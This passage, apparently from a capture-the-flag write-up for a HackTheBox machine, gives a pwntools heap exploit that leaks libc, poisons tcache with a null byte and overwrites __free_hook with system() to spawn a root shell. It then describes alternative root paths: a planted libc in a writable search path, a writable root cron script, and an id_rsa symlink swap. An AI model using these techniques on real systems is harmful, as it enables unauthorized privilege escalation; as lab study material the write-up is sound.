alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address)) #know that read maxes out at 0x200
#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    free(i+2)
#7 chunks in 0x40 tcache
#tcache should be filled now
#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x30-i-1))
free(2)
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
free(3)
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
free(3)
for i in range(6):
    alloc(small, 'F' * (small-i-1))
    free(3)
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(3)
free(4) #chunk coalesced now
alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
free(6)
free(7)
free(8)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/sh\x00') #9
free(9)
p.interactive()

And you should now have a root shell! During this box's lifecycle, there were actually several other unintended paths and alternative methods that made this box easier, one of which was the large heap overflow I mentioned above, which could make tcache poisoning trivial.

Another one, which D3v17 and I discovered early on while stracing the binary, was that because it had been patchelf'd, it searched ./tls/x86_64/x86_64/libc.so.6 and a few other local subdirectories before checking the local directory for the libc file. We had write permissions, so we were able to create one of those directories containing a patched libc that redirected one of the program's function calls to simply call system("/bin/sh"). This was patched later on.

Xct also took root blood first with an unintended path involving a cron job that executed Python files as root from a directory writable by www-data. These files were broadcast.py and connection.py in /var/www/product/protobs, which opened up an easy route to root. This path was patched as well.

Lastly, here is one more unintended/alternative path I heard about from both D3v17 and xct. To quote D3v17: "A user can upload inotifywait (static binary) and then start monitoring /home folder using inotifywait -m -r /home. Inotifywait will show that /.ssh/id_rsa is opened,read and closed. So the user can replace id_rsa with a symlink to /root/root.txt and read the flag using mqtt."

Regardless, this box was still very fun! Congrats to b14ckh34rt and MrR3boot, who always produce engaging and exciting content!